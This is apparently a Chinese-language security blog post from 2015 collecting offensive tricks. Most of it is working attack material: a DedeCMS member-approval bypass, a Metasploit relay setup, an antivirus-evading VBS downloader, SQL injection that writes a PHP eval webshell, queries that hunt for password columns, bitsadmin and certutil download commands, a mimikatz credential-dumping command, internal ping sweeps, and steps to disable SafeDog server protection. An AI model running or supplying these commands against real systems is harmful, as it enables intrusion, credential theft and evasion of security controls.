一些有意思的玩意

发布时间:April 26, 2015 // 分类:运维工作 // No Comments

1.dedecms绕过非审核会员机制

/member/index_do.php?fmdo=user&dopost=regnew&step=2 

注册后直接访问 "完善资料" 的url,"完善"一下就激活了。

2.msf转发上线

中转IP上运行

lcx -listen 1433 3306

KALI里面运行

use multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set LPORT 3306
set RHOST x.x.x.171
exploit

原理就是利用中转服务器对数据进行对接

3.一个免杀的WGET.vbs

iLocal = LCase(WScript.Arguments(1))   
iRemote = LCase(WScript.Arguments(0)) 
Set testPost = CreateObject("Microsoft.XMLHTTP") 
testPost.Open "GET",iRemote,0 
testPost.Send() 
Set sGet = CreateObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(testPost.responseBody) 
sGet.SaveToFile iLocal,2

它的原型

echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs

使用方法:cascript iget.vbs url save filename

4.SQL Injection 在 ORDER BY 內使用 into outfile

在 ORDER BY 后不能使用 UNION

除了可以使用

LINES TERMINATED BY 0x41414141

來定义Webshell 外还可以使用

select user() from login order by if(( select 'abc' into outfile '/tmp/1.php'),1,1);

來导出 Webshell

在limit后还可以这样使用

select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xxx limit 1 into outfile 'C:/shell.php'

如果受到单引号等的影响,可以考虑如下的办法

set @a=0x73656C6563742030783343334637303638373032303430363537363631364332383234354635303446353335343542323736333644363432373544323933423346334520696E746F206F757466696C652027433A2F7368656C6C2E70687027;
prepare cmd from @a;
execute cmd;

其原型如下

set @a=select <?php @eval($_POST['cmd']);?> into outfile 'C:/shell.php';
prepare cmd from @a;
execute cmd;

5.在msql sqlserver里边怎么快速找到带有关键字的表

sql server 全部库:

declare @i int,@id int,@dbname varchar(255),@sql varchar(255)
    set @i = 6
    set @id=(select count(*) from master..sysdatabases)

drop table #t
create table #t (
    dbname varchar(255),
    tablename varchar(255),
    columnname varchar(255)
)

while (@i < @id)
    begin
        set @i = @i + 1;
        set @dbname = (select name from master..sysdatabases where dbid= @i)
        set @sql = 'use '+ @dbname+';insert [#t] select table_catalog,table_name,column_name from information_schema.columns where column_name like ''%pass%'' or column_name like ''%pwd%'' or column_name like ''%mail%'''
        exec (@sql)
        --print @sql
    end

select * from #t
drop table #t

go

sql server单个库:

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');

mysql:

select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');

6.wireshark使用的时候wincap报错.

unable to load winpcap(wpcap.dll); wireshark will not be able to capture packets.
解决办法:
因为npptools.dll这个权限被去掉了,重新分配一下权限就可以了。如果修改权限还是不行。就表示文件被破坏掉了

Unable to load WinPcap (wpcap.dll); Wireshark will no be able to capture packets.
Fix:

The NPF driver isn't running.
Fix: from elevated command prompt: net start npf

Notes: 
The problem is only with the 64-bit version of Wireshark.
wireshark-win32-1.2.0.exe installs and works fine on both Windows 7 x86 and x64. 
Network Monitor 3.3 x64 is installed and works.

7.关于文件下载

Bitsadmin File Download

Bitsadmin是Windows命令行工具,用户可以使用它来创建下载或上传的任务。

bitsadmin /transfer n http://domain/file c:\%homepath%\file

还有一个certutil

certutil -urlcache -split -f http://www.baidu.com/1.rar

8.mimikatz不反弹读取密码.

有些时候无法反弹shell执行mimikatz,虽然可以用procdump导出lsass的内存dump文件,之后本地获取明文密码,但多少有点麻烦,其实mimikatz也支持命令行直接导出

mimikatz.exe privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit

9.内网里的无工具扫描

内网C段存活主机查找,这条来自核大很早以前的回帖

for /l %i in (1,1,255) do @ping 10.0.1.%i -w 1 -n 1 | find /i "ttl"

通过上面一条,加上我在内网玩的经验,延伸出了下面这条,是用来找主机名的

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

再从上面一条,延伸出了B段查找,因为在一个内网里面有时候不一定只有一个域,而当两个域没有信任时,可以用这条扫出来

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

这条也是核攻击大牛发的,是用来找域机器对应IP的

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

10.安全狗开启各种保护,突破方法:首先在Shell下把安全猪的安装配置给下来 默认安装路径:

C:\Program Files\SafedogServer\SafeDogGuardCenter\Config\DirDefend.xml
导入本地的安全服务器安全狗查看    主动防御 - 文件及目录保护  查看是否开启各种保护。如果开启了,直接关掉。然后再把DirDefend.xml替换到远程服务器上去,重启服务器,各种操作。如果还开启了密码保护,打开注册表 regedit ,找到HKEY_LOCAL_MACHINE\SOFTWARE\Safedog\SafedogSR 删除SafedogSR 即可突破安全猪密码保护。

11.报错注入中读文件找路径太慢,折腾了一个一条语句查找web路径的sql语句

select substring_index(replace(load_file('/etc/apache2/sites-enabled/000-default.conf'),substring_index(load_file('/etc/apache2/sites-enabled/000-default.conf'),'DocumentRoot',1),''),'\n',1) as test;

 

标签:none

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...